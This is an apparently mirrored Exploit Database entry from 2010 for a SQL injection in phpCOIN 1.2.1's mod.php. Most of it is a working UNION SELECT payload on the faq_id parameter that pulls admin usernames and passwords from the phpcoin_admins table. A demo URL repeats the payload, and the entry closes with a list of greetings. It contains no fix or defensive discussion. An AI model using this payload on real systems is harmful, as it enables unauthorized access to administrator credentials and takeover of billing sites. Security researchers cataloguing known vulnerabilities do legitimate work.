PHPCOIN 1.2.1 – ‘mod.php’ SQL Injection

• Exploit Database
• 12 阅读

• 作者： BAYBORA
  日期： 2010-02-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11565/

• phpCOIN 1.2.1 (mod.php) SQL InjectionVulnerability 
  
  ###########################
  
  Author: Baybora
  
  Homepage: http://www.1923turk.com 
  
  Blog: http://baybora.wordpress.com/ 
  
  Script: phpCOIN 1.2.1
  
  Download: http://www.phpcoin.com/
  
  ###########################
  
  [ Vulnerable File ]
  
  mod.php?mod=faq&mode=show&faq_id= [ SQL ]
   
  
  [ XpL ]
  
  -1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--
  
  
  [ Demo]
  
  
  http://serverbilling/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--
  
   
  ##############################################################
  # Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
  ##############################################################